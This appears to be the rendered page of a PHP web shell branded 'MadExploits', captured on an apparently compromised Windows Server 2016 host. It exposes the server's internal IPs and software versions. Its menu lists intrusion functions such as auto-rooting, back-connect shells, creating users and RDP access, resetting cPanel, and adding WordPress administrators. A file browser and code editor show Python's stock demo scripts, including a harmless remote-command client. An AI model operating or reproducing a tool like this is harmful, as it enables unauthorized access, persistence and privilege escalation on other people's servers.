Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
python /
python-3.10 /
Tools /
demo /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxrwxrwx
beer.py
591
B
-rw-rw-rw-
eiffel.py
3.96
KB
-rw-rw-rw-
hanoi.py
4.65
KB
-rw-rw-rw-
life.py
9.03
KB
-rw-rw-rw-
markov.py
3.73
KB
-rw-rw-rw-
mcast.py
2.25
KB
-rw-rw-rw-
queens.py
2.3
KB
-rw-rw-rw-
redemo.py
5.78
KB
-rw-rw-rw-
rpython.py
848
B
-rw-rw-rw-
rpythond.py
1.35
KB
-rw-rw-rw-
sortvisu.py
20.14
KB
-rw-rw-rw-
spreadsheet.py
25.83
KB
-rw-rw-rw-
vector.py
1.92
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rpython.py
#!/usr/bin/env python3 """ Remote python client. Execute Python commands remotely and send output back. """ import sys from socket import socket, AF_INET, SOCK_STREAM, SHUT_WR PORT = 4127 BUFSIZE = 1024 def main(): if len(sys.argv) < 3: print("usage: rpython host command") sys.exit(2) host = sys.argv[1] port = PORT i = host.find(':') if i >= 0: port = int(host[i+1:]) host = host[:i] command = ' '.join(sys.argv[2:]) with socket(AF_INET, SOCK_STREAM) as s: s.connect((host, port)) s.send(command.encode()) s.shutdown(SHUT_WR) reply = b'' while True: data = s.recv(BUFSIZE) if not data: break reply += data print(reply.decode(), end=' ') main()
Close